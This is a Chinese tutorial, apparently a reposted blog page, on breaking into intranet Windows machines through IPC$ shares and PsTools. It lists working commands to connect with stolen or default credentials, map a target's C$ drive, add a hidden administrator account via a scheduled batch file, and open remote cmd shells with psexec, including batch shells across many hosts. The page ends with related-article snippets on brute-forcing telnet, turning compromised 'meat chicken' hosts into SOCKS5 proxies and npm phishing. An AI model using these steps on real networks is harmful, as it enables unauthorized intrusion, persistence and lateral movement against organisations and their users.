内网IPC$入侵加pstools之远程控制

前言:

IPC$(Internet process connection)是指内网里面的文件共享连接,通常很多机子的默认共享都是打开的,在cmd下使用命令net share可查看自己的IPC$是否打开。

PsTools是Sysinternals Suite中一款排名靠前的一个安全管理工具套件。现在被微软收购。目前pstools中含有12款各式各样的小工具。如果将它们灵活的运用,将会在渗透中收到奇效。所有的pstool第一次运行时都会弹框。可以用–accepteula这个参数绕过。

pstools可批量远程操作windows服务器,还有所有的pstool都支持IPC$,一旦IPC$共享是连接的就不用输入-u 和-p这两个参数。

IPC$共享连接

在内网对已知用户密码的主机建立IPC$连接,命令如下:

Net use \\目标ip\IPC$ "密码" /user:"用户"

如果目标内网机是xp的系统,那么可以不用用户和密码即可建立IPC连接,且攻击机的系统不能是win10及以上

例如:

net use \\192.168.1.121\IPC$ "123456" /user:"administrator"

建立后所有的ps工具都将可以不用输入用户和密码了。

建立连接之后可以进行磁盘映射

net use Z: \\192.168.1.121\c$
将目标机的C盘映射到本机的新建Z盘

用IPC$添加用户的操作:

net user test 123456 /add
net localgroup administrators test /add
将上诉两条命令保存位adduser.bat文件,然后在本机上执行(已建立连接)
copy adduser.bat \\192.168.1.121\c$
net time \\192.168.1.121
at \\192.168.1.121 执行时间 c:\adduser.bat
删除当前连接,用新的用户建立IPC$连接
net use \\192.168.1.121\ipcc$ /del

开启23端口可用telnet登录。

pstools工具使用

需要目标主机开启admin$共享且必须在一个内网才能使用,pstools包含一套工具

其中12款工具简介如下:

PsExec - 远程执行进程
PsFile - 显示远程打开的文件
PsGetSid - 显示计算机或用户的 SID
PsInfo - 列出有关系统的信息
PsKill - 按名称或进程 ID 终止进程
PsList - 列出有关进程的详细信息
PsLoggedOn - 查看在本地通过资源共享(包含所有资源)登录的用户
PsLogList - 转储事件日志记录
PsPasswd - 更改帐户密码
PsService - 查看和控制服务
PsShutdown - 关闭并重新启动(可选)计算机
PsSuspend - 暂停进程

psexec介绍

ps利用最大的就是他了,他可以配合ipc使用。

获取目标机的shell命令结构为:

psexec \\目标ip -u 用户名 -p 密码 进程名
psexec \\192.168.1.121 –u administrator –p 123456 cmd.exe

如果ipc已建立连接,那么可以不用输入用户密码,直接 psexec \\192.168.1.121\ cmd.exe就好了,exit退出shell。

批量运行psexec连接cmd,这个方法适合用于内网存在大量xp系统,先将这些ip保存在一个记事本里面,然后按顺序写好一系列cmd命令放入bat文件中,然后命令行输入:

PsExec @D:\PSTools\ip.txt -c D:\PSTools\20150415.bat cmd.exe

即可返回批量shell。

如果想要远程机器执行本地c:\srm.exe文件可以打:

psexec \\远程机器ip -u administrator -p 123 -c c:\srm.exe

本片文章只讲了IPC$和pstools里面的psexec的配合使用,其他pstools工具的使用请参照以下链接:

参考链接:https://www.cnblogs.com/h4ck0ne/p/5154599.html

原文地址:https://www.cnblogs.com/-chenxs/p/11769735.html

时间: 2024-11-09 03:51:27

内网IPC$入侵加pstools之远程控制的相关文章

如何将网页发布到IIs,并使用花生壳内网映射到外网。

今天做了一个网页,想发布到IIS上,结果提示未安装发布所需的扩展,Google了一下说是Vs安装有问题,要么重装要么修复,奈何时间不允许,本身网页也比较简单,一个Html页面+几个css和Js文件夹,索性在Vs里新建了一个网站,运行没问题后,打包发布网站. 而后在IIs管理器中添加网站 IIS怎么下载,怎么打开扩展功能,园子里很多了,不赘述,配置完成浏览看到正确页面,证明网站已经正式发布在IIS上了. 而后用花生壳添加对外网的映射. 内网Ip地址加IIs网站端口号映射到外网域名.(花生壳需要注册

exchange 2010 server内网邮箱突然不能收发外网邮件的问题分析解决办法

环境是,域控+exchange2010server+edge边缘服务器的邮件系统. 故障现象:某个内网邮箱以前可以收发外网邮件,现在突然不能收发外网邮件了. 故障分析:分析最近对服务器做了那些操作. 解决办法:原来是自己更改了设置,没有留意这个内网邮箱用户加了多个通讯组,通讯组有交叉,对这些通讯组设置禁止收发邮件的规则,把这个邮箱也给禁止了,增加了允许这个邮箱的邮件传输规则,故障排除.

【APT】NodeJS 应用仓库钓鱼,大规模入侵开发人员电脑,批量渗透各大公司内网

APT][社工]NodeJS 应用仓库钓鱼,大规模入侵开发人员电脑,批量渗透各大公司内网 前言 城堡总是从内部攻破的.再强大的系统,也得通过人来控制.如果将入侵直接从人这个环节发起,那么再坚固的防线,也都成为摆设. 下面分享一个例子,利用应用仓库,渗透到开发人员的系统中. 应用仓库 应用仓库对于开发人员再熟悉不过了.apt-get,brew,yum,npm ... 无非就是个命令行版的 App Store,方便各种工具以及依赖库的安装. 他们大致原理都差不多.今天讲解的是 NodeJS 应用仓库

远程控制使用kill软件映射内网进行远程控制(9.28 第十四天)

1.能ping通IP情况下远程控制 设置kill软件中的端口.密码.上线列表 2.在软件的Bin\Plugins目录下找到Consys21.dll复制到/phpstudy/www目录下留作生成软件 3.网页打开Ngrok进行我们的控制端口映射 4.开启ngrok的客户端 5.服务生成填写域名IP和端口,然后测试 6.至此我们的域名IP和端口已经映射到了内网上了,下面我们来配置控件地址,同样我们要开通一个隧道,用作生成地址 也就是把我们的phpstudy下的www下复制的那个文件映射到内网. 7.

医院内外网之间通过网闸交互,通过端口转发加nginx代理实现内网访问外网

首先介绍下主要需求,很简单,就是要在医院his系统内嵌公司的平台,实现内网直接访问外网 这是院方给我提供的网闸相关配置,105是医院内网的服务器,120是外网的服务器,中间通过网闸配置的几个端口实现互通 首先我们需要用windos的netsh命令增加一条端口转发规则 172.16.20.105的10002端口转发到172.16.21.27的10003端口 然后我们在27服务器上的10003端口启动sso服务以供调用,调用之后返回 然后需要在27上做一个nginx代理以实现对外网的访问 最后我们在

内网暴力破解telnet密码进行登陆

这里只是一个思路,傻瓜式的方法偶尔也会比较实惠. 有时候,你在网吧,机房使用电脑时,就在内网.一般来说,内网的安全性较差,在那些3389端口大开,没有组策略限制的地儿,我们可以用以下方法来傻瓜式入侵内网的其他机子. 扫描内网网段内开启了3389的机子有哪些,这里我用了nmap,发现了一台主机192.168.72.141和143在线开了3389: 然后打开tscrack,进行暴力破解:当然,这里你需要自己选择密码文本的内容: 一般来说,软件生成比较方便: 3.默认模式为对Administrator

制造企业内网安全现状及应对之道

本文分析了现阶段我国制造行业内网安全的现状和需求,提出建立“以计算机安全防护为基础,以数据泄漏防护DLP为核心,以桌面运维.监控审计.接入控制为辅助,以管理制度为约束”的综合内网安全管理体系. 1.制造业信息安全现状 近年来我国制造行业信息化发展迅速,大型制造业的网络和各类信息化应用系统建设完善,其网络规模较大,信息化程度较高,安全建设相对完善,多数大型制造企业具有网络安全防护体系.计算机防病毒等体系,企业的信息化已经从“建设期”逐渐转入到“维护管理期”;我国制造业中,中小企业居多,在中小企业里

黑客教你将内网肉鸡作成Socks5服务器

话说在挂马得到大量肉鸡以后,众黑友可能都在想如何利用手中的这些战利品.有人喜欢偷窥人家的隐私,有的人可能就会用木马的键盘记录盗取人家的QQ密码,还有的人可能要盗取人家的宽带上网帐号充Q币.可大家有没有想到过将内网中的这些肉鸡作成SOCKS5服务器呢?这样的话,我们以后入侵就可以用这些肉鸡作跳板,黑人家也会安全的多了.有人说内网中作SOCKS5服务器不可能,即使作成了也无法利用,好,今天我就将我的一些实践经验写出来与大家共享,没什么技术含量,大家交流一下,如果大家有更好的方法,还请不吝赐教哟! 首

vpn+squid搞定内网才能访问的svn

业精于勤荒于嬉,愿程序猿们鼓起干劲,坚持学下去! 目录 前言 一.squid安装和使用 二.本机的svn代理设置 前言 今天由于要修改公司项目的配置文件,于是不得不秒登vpn,登上svn跳板机,把要修改的文件update下来.修改完成后,在跳板机上传,最后再经过几道程序,终于更新到线上了. 对于不能在个人电脑上update公司svn的代码,着实有些不方便.当然公司是为了代码安全考虑,多加一点防范,我们是可以理解的. 于是,又开始琢磨怎么把svn的代码搞到本机.其实,这问题蛮简单的,只要对于网络知